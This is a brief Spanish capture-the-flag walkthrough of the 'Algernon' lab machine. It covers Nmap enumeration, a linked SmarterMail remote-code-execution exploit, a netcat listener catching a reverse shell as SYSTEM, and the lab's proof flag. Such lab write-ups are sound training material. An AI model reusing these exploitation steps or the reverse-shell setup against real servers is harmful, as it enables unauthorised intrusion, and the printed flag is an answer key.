Skip to content

Algernon

Description

Esta maquina tenia un RCE en el servicio SmarterMail que otorga permisos administrativos directos

Enumeration

Nmap 

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  10:31PM       <DIR>          ImapRetrieval
| 05-03-22  01:38AM       <DIR>          Logs
| 04-29-20  10:31PM       <DIR>          PopRetrieval
|_04-29-20  10:32PM       <DIR>          Spool
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
9998/tcp  open  http          Microsoft IIS httpd 10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Thu, 02 Jun 2022 07:39:56 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open  remoting      MS .NET Remoting services
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Webinfo 
http://192.168.169.65 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.169.65], Microsoft-IIS[10.0], Title[IIS Windows], X-Powered-By[ASP.NET]

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 30 Apr 2020 05:29:47 GMT
Accept-Ranges: bytes
ETag: "c692185db01ed61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Thu, 02 Jun 2022 07:45:31 GMT
Content-Length: 696

Root Own

Tras visitar el servicio web en el puerto 9998 veo un servicio llamado 'SmarterMail'. Este servicio es vulnerable a RCE en el puerto 17001. Existe un exploit aqui . Solamente hay que modificar la ip destino y la local y poner a escuchar un netcat en el puerto 4444 

root@kali:~/PG/Windows/192.168.169.180/xpl# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.49.169] from (UNKNOWN) [192.168.169.65] 49879

PS C:\Windows\system32> whoami
nt authority\system

La shell recibida tiene permisos administrativos. GameOver.

Proof

PS C:\Users\Administrator\Desktop> type proof.txt
5646a8923a6b114ccd74b7b7f74393d9
Back to top